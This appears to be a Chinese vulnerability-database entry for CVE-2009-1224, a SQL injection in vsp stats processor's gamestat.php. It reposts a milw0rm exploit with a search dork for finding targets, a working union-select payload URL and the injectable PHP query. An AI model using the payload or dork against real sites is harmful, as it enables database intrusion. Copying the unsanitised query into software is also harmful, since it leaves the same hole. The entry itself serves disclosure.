scivox vsp_stats_processor 'gamestat.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117538 漏洞类型 SQL注入
发布时间 2009-03-31 更新时间 2009-03-31
CVE编号 CVE-2009-1224 CNNVD-ID CNNVD-200904-036
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8331
https://www.securityfocus.com/bid/34320
https://cxsecurity.com/issue/WLB-2009040102
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-036
|漏洞详情
vspstatsprocessor0.45版本中的vsp-core/pub/themes/bismarck/gamestat.php存在SQL注入漏洞。远程攻击者可以借助gameID参数,执行任意的SQL指令。
|漏洞EXP
########################################
#                                         #
# Product : vsp stats processor           #
# Version : all                           #
# Dork : "powered by vsp stats processor" #
# Site: http://www.scivox.net/vsp/        #
# Found by: Dimi4                         #
# Date : 31.03.09                         #
# Greetz: antichat                        #
#                                         #
########################################

SQL-injection
[+] URL: http://target.com/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x203a20,user(),database(),version()),2/*&config=cfg-default.php
[+] Output: <option> {DATA} </option>

Bug Function: (vsp-core\pub\themes\bismarck\gamestat.php 540-558 lines)

 function getStatsGame()
{
  global $db;
  global $ggame;
  $sql = "select name, value
            from {$GLOBALS['cfg']['db']['table_prefix']}gamedata
            where gameID=$GLOBALS[gameID]
         ";

  //echo $sql;
  $rs = $db->Execute($sql);

.....
}


(c) Dimi4, 2009 greetz to antichat

# milw0rm.com [2009-03-31]
|受影响的产品
vsp stats processor vsp stats processor 0.45
|参考资料

来源:MILW0RM
名称:8331
链接:http://www.milw0rm.com/exploits/8331